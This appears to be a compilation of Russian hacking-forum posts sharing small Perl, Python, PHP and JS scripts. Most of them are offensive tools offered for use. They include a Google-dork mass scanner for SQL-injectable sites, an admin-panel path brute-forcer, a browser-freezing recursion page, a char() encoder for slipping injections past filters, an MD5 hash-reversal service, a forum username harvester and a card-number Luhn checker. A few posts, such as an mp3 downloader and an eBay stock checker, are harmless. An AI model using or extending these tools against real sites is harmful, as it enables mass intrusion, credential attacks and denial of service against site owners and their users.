[REQ] Mod - SQL - Google Search Hi all i need some perl guru help to modify this. Old Options 1.Insert Dork:inurl:index.asp?id=1 2.Total Query Pages (10 Links/Pages) :20 to new option in 1 line dork + query and option to save result in vuln.txt file in the same directoy Insert Dork:inurl:index.asp?id=1 20 vuln.txt Code: #!/usr/bin/perl use LWP::Simple; use LWP::UserAgent; use HTTP::Request; my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } print "+++++++++++++++++++++++++++++++\n"; print "+ SQL - Google Search +\n"; print "+ CWH Underground +\n"; print "+++++++++++++++++++++++++++++++\n\n"; print "Insert Dork:"; chomp( my $dork = <STDIN> ); print "Total Query Pages (10 Links/Pages) :"; chomp( my $page = <STDIN> ); print "\n[+] Result:\n\n"; for($start = 0;$start != $page*10;$start += 10) { $t = "http://www.google.com/cse?cx=013269018370076798483:gg7jrrhpsy4&cof=FORID:1&q=".$dork."&btnG=Search&start=".$start; $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2'); $ua->timeout(10); $ua->env_proxy; $response = $ua->get($t); if ($response->is_success) { $c = $response->content; @stuff = split(/<a href=/,$c); foreach $line(@stuff) { if($line =~/(.*) class=l/ig) { $out = $1; $out =~ s/\"//g; $out =~s/$/\'/; $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2'); $ua->timeout(10); $ua->env_proxy; $response = $ua->get($out); $error = $response->content(); if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/) {print "$out => Could be Vulnerable in MySQL Injection!!\n";} elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/) {print "$out => Could be Vulnerable in MS Access Injection!!\n";} elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/) {print "$out => Could be Vulnerable in MSSQL Injection!!\n";} elsif($error =~m/Microsoft OLE DB Provider for Oracle/) {print "$out => Could be Vulnerable in Oracle Injection!!\n";} } } } } test the script and if can to modefy and tweak other tings will be good too. Thanks in Advance Best regards Dima
Многопоточный граббер прокси Многопоточный граббер прокси (из списка сайтов ) Code: #(с) Gaus #!/usr/bin/perl -w use LWP::UserAgent; use threads; use threads::shared; my @sites : shared; ############################### my $threads = 1; # Кол-во потоков my $proxy = 'proxy.txt';# Файл с награбленными прокси my $sites = 'sites.txt';# Файл со списком сайтов(откуда грабить) ############################### open (S, "<$sites") || die("Could not open ".$sites." file!!!"); open (F, ">>$proxy") || die("Could not open ".$proxy." file!!!"); @sites = <S>; my $num; my $saw; for(0..$threads) {$trl[$_] = threads->create(\&Grab, $_);} for(@trl) { $_->join; } sub Grab { while (@sites){ $site = shift @sites; $ua = new LWP::UserAgent; $ua->timeout(30); $data = $ua->get($site)->as_string; print "Grabbing proxys from: ".$site." ...\n"; while($data =~/(\d*\.\d*\.\d*\.\d*)\:(\d*)/msgi) { print F $1.":".$2."\n"; print $1.":".$2."\n"; } print "#############################\n"; } } close (F); close (S);
Онлайн сервис по расшифровке хешей... Скрипт "Онлайн сервис по расшифровке хешей" В папке со скриптом должна быть папка base с правами 777. Функции: - поиск хэшей по базе; - возможность добавлять свои пароли в базу. Требования: - Php 5 PHP: <?php // Поиск по базе if(isset($_POST['go'])) { echo '<div align="center">Введите хэши (MD5)<br><form method=post><textarea cols=50 rows=15 name="hash"> </textarea><br><br><input name="go" type=submit value="Искать по базе"></form></div>'; $h = explode("\n", $_POST['hash']); for ($j = 0; $j<=count($h)-1; $j++) { $hash = rtrim($h[$j]); if (strlen($hash)==32) { $hd = "base"; for ($i = 1;$i<=32;$i++) { $hd = $hd."/".$hash[$i-1]; } if (file_exists($hd)) { $qpass = array_pop(scandir($hd)); $arq = explode(".", $qpass); for ($i = 1;$i<=count($arq) ; $i++) { $pass[$i-1] = chr($arq[$i-1]); } print_r('<div align="center">'.$hash.":".implode($pass)."</div>"); } else { print_r('<div align="center">'.$hash.": не найден</div>"); } } } } else { echo '<div align="center">Введите хэши (MD5)<br><form method=post> <textarea cols=50 rows=15 name="hash"></textarea><br><br><input name="go" type=submit value="Искать по базе"></form></div>'; } // Добавление хэшей в базу if(isset($_POST['add'])) { echo '<br><br><div align="center">Введите пароли по одному в строке<br><form method=post> <textarea cols=50 rows=15 name="pass"></textarea><br><br><input name="add" type=submit value="Добавить пароли в базу"></form></div>'; $p = explode("\n", $_POST['pass']); for ($j = 0; $j<=count($p)-1; $j++) { $pass = rtrim($p[$j]); if ($pass<>'') { $len = strlen($pass); $fname = ""; for ($i=1;$i<=$len;$i++) { $fname = $fname."".ord($pass{$i-1})."."; } $hash=md5($pass); $dir = "base"; for ($i = 1;$i<33; $i++) { $dir = $dir."/".$hash{$i-1}; if (file_exists($dir)) {} else { mkdir($dir); } } fopen($dir."/".$fname, "w"); } } print_r('<div align="center">Ваши пароли успешно добавлены в базу</div>'); } else { echo '<br><br><div align="center">Введите пароли по одному в строке<br><form method=post> <textarea cols=50 rows=15 name="pass"></textarea><br><br><input name="add" type=submit value="Добавить пароли в базу"></form></div>'; } ?>
Последний ФФ виснет намертво. Утечки памяти нету, но зависает браузер.. ИЕ просто выпадает. Опера работает) ФФ последний. ИЕ 6. PHP: <html> <body> <form name="a" > <div id="d"> <input type="button" id="add"><br><br> <img border='0' src='1.gif' onLoad='add();'> </div> </form> <script language="javascript"> function add(){ div=document.getElementById("d"); button=document.getElementById("add"); newitem="<a target='_blank' "; newitem+="href='http://mrthe.name/'>"; newitem+="<img border='0' src='1.gif' onLoad='add();'></a>"; newitem+="<scri"; newitem+="pt>add();</sc"; newitem+="ript>"; newnode=document.createElement("span"); newnode.innerHTML=newitem; div.insertBefore(newnode,button); add(); } add(); </script> </body> </html> Кроспост в моём блоге: http://mrthe.name/2009/03/opera-forever/ (+ подробности)
чем тестил? щас проверяю на http://browsershots.org/ опера более-мение подгружает. остальные пока в дауне(при условии вкл javascript)
А что должно вызвать утечки памяти? Замыканий нет, циклических ссылок нет. Есть бесконечная рекурсия, которую опера благоразумно прерывает, когда заканчивается стек вызовов.
вот и я искал. ибо опера у меня перед этим благополучно схавала 3 гига памяти. перезагрузил оперу. открыл страницу, которую открывал до этого. всё норм. но обилие js и картинок. память не утекает. вот стало нефиг делать решил поковырять...
Брутер расположения с адинки на питоне. Code: #/usr/bin/python import sys, os, time, httplib if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) if len(sys.argv) != 2: print "\n|-------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "| Help: admin-find.py -h |" print "|---------------------------------------------------------------|\n" sys.exit(1) for arg in sys.argv: if arg == '-h': print "\n|-----------------------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "| Usage: admin-find.py www.site.com |" print "| Example: admin-find.py site.com |" print "|-------------------------------------------------------------------------------|\n" sys.exit(1) site = sys.argv[1].replace("http://","").rsplit("/",1)[0] site = site.lower() admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'] print "\n|-------------------------------------------------------------|" print "| Admin login finder v2.0 |" print "|---------------------------------------------------------------|\n" print "\n[-] %s" % time.strftime("%X") print "[+] Target:",site print "[+] Checking paths..." print try: for admin in admin_path: admin = admin.replace("\n","") admin = "/" + admin connection = httplib.HTTPConnection(site) connection.request("GET",admin) response = connection.getresponse() print "%s %s %s" % (admin, response.status, response.reason) except(KeyboardInterrupt,SystemExit): raise except: pass
Чёкер номеров кредитных карт. Чёкер номеров кредитных карт. Code: <? function luhn_check($number) { $number=preg_replace('/\D/', '', $number); $number_length=strlen($number); $parity=$number_length % 2; $total=0; for ($i=0; $i<$number_length; $i++) { $digit=$number[$i]; if ($i % 2 == $parity) { $digit*=2; if ($digit > 9) { $digit-=9; } } $total+=$digit; } return ($total % 10 == 0) ? TRUE : FALSE; } ?>
PHP: #! /usr/bin/env python # -*- coding:windows-1251 -*- #-#######################################################-## # Скачиваем музыку ## # (c) 2009 ## # Создал специально для себя, ## # так как инет медленный, а без ## # Транса, кодить не умею... ## # De-visible project ## # ndcoders.ru ## # GreetZ To login999 ## # Thanks to http://mp3.myws.ru/index.php/search?q=trance ## # Также делаем программы на заказ ## # Контакт ICQ#: 22-3333-575 ## # Мы: ndcoders.ru, devisible.ru ## #-######################################################-### import urllib import time import re import threading import urlparse import string URL_MAS = [] s = 0 def DownFile(url): f = urlparse.urlsplit(url) mp3_name = str(f.path).strip('\/') mp3_name = str(mp3_name).strip('[') mp3_name = str(mp3_name).strip(']') mp3_name = str(mp3_name).strip('\'') mp3_name = mp3_name.replace('/','1') try: print u"Начинаем закачку файла: ", mp3_name, '\n' print u"Размер файла: ", GetSizeMp3(url), "byte" infile = urllib.urlopen(url).read() except: print u"Ошибка скачивания: ", mp3_name print u", Файл закачен\n" mp3_file = open(mp3_name+str(s)+'.mp3',"wb") mp3_file.write(infile) mp3_file.close() print 'File Saved Local' def GetSizeMp3(url): size_mp3 = urllib.urlopen(url).info() mp3 = str(size_mp3) s_mp3 = str(re.findall(r'Content-Length: (.*?)\r\n',mp3))[2:-2] print s_mp3 def LoadFromFile(): with open("urls.txt",) as urls: for ur in urls: URL_MAS.append(ur[:-1]) def ServerOption(): info = urllib.urlopen('http://mp3.myws.ru').info() with open('serv_option.txt',"w") as serv: serv.write(str(info)) print ''' Author: De-visible, ICQ#: 22-3333-575 WeAre: ND_c0ders, ndcoders.ru ServerOption: mp3.myws.ru ''' print info,'\n\n' def Start_Process(): LoadFromFile() print u"Массив ссылок загружен",'\n' print u"Менеджер закачек запущен",'\n' ServerOption() for url_mas in URL_MAS: DownFile(url_mas) s = s + 1 print u" Все закачки завершены" threading.Thread(target = Start_Process).start() time.sleep(1000)
Скрипт для ТС-а вот этого топика: http://forum.antichat.ru/thread114182.html Проверяет наличие указанного вами товара в интернет магазине www.ebay.com PHP: <?php if(isset($_POST['go'])) { echo 'Введите наименование товара, например <b>iphone, nokia n95 </b> ну или ещё что-нибудь..)<br><br><form method=post><input type="text" name="n"> <input name="go" type=submit value="Проверить"></form>'; $name = str_replace(" " , "+", $_POST['n']); $url = "http://shop.ebay.com/items/?_nkw=".$name; $page = file_get_contents($url); preg_match_all("/(?<=Matching products<\/span><span class=\"cnt\">\()([0-9]*)(?=\))/", $page, $match); $n = array_pop(array_pop($match)); if ($n<>"") { print_r("Товар <b>".$_POST['n']."</b> имеется в наличии в количестве <b>".$n."</b> штук"); } else { print_r("Товар <b>".$_POST['n']."</b> отсутствует"); } } else { echo 'Введите наименование товара, например <b>iphone, nokia n95 </b> ну или ещё что-нибудь..)<br><br><form method=post> <input type="text" name="n"> <input name="go" type=submit value="Проверить"></form>'; } ?>
JS переводящий word -> char (SQL) Все мы любим SQL инекции и знаем что если нельзя вписать буковку то можно вприсать char(код) Code: <html> <head> <title> Word -> Char (SQL) </title> <script language='javascript'> function char(str) { len = str.length; if(len==0){return 'null';} rez=''; for(i=0;i<len;i++) { n = str.charCodeAt(i); if(n>1000){n=n-848;} rez=rez+''+n; if(i+1<len){rez=rez+',';} } return('char('+rez+')'); } </script> </head> <body> <input type=text id=enter> <input type=button value=" Gen " onclick="javascript:show.innerHTML=char(enter.value)"><br> <div style='padding:7;background:#f8f8f8;font:15pt system' align=center id=show></div> </body> </html>
Парсит ссылки с гугла по кейворду PHP: <?php /* | | www.google.ru parser | C0d3d by Exgibichi | 27/07/08 | */ set_time_limit(0); $n = 20; // number of pages $keyword = 'keyword'; //keyword for parse function googlelinkparse($keyword,$n) { $keyword = str_replace(' ','+',$keyword); $url = 'http://www.google.ru/search?q='.$keyword.'&num=100&filter=0&start='.$n.'0'; $file = file_get_contents($url) or die('Could not access file'); $exp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>"; if (preg_match_all("/$exp/siU", $file, $matches, PREG_SET_ORDER)) { $c = count($matches); for ($i=0; $i<$c; $i++) { if (strstr($matches[$i][2],'http://') && !strstr($matches[$i][2],'google') && !strstr($matches[$i][2],'search?q=cache') && !strstr($matches[$i][2],'youtube') && !strstr($matches[$i][2],'/aclk?sa')) { $links[] = $matches[$i][2]; } } } return $links; } for ($i=0; $i<$n; $i++) { $link = googlelinkparse($keyword,$i); $c = count($link); for ($j=0; $j<$c; $j++) { $f = fopen('links.txt','a+'); fputs($f,$link[$j]."\r\n"); fclose($f); } sleep(10); } ?>
vBulletin nickname grabber Code: #!/usr/bin/perl use LWP::UserAgent; system('cls'); print qq( ============================== # vBulletin nickname grabber # # coded by ph1l1ster # # icq: 612672 # ==============================\n\n\n ); print qq( Enter adress: e.g. - http://forum.site.ru/ > ); $adr=<STDIN>; chomp($adr); print qq( Enter numbers of page: e.g. - 294 > ); $page=<STDIN>; chomp($page); open (A, ">>nicknames.txt"); $count = 1; while ($count <= $page) { $url=$adr."memberlist.php?do=getall&order=asc&sort=username&page=".$count ++; $client = LWP::UserAgent->new( ) or die; $answer = $client->get($url); @nicknames=$answer->content =~ /<a href=\"member.*?u=.*\">(.*)<\/a>/g; print A join "\n", @nicknames;}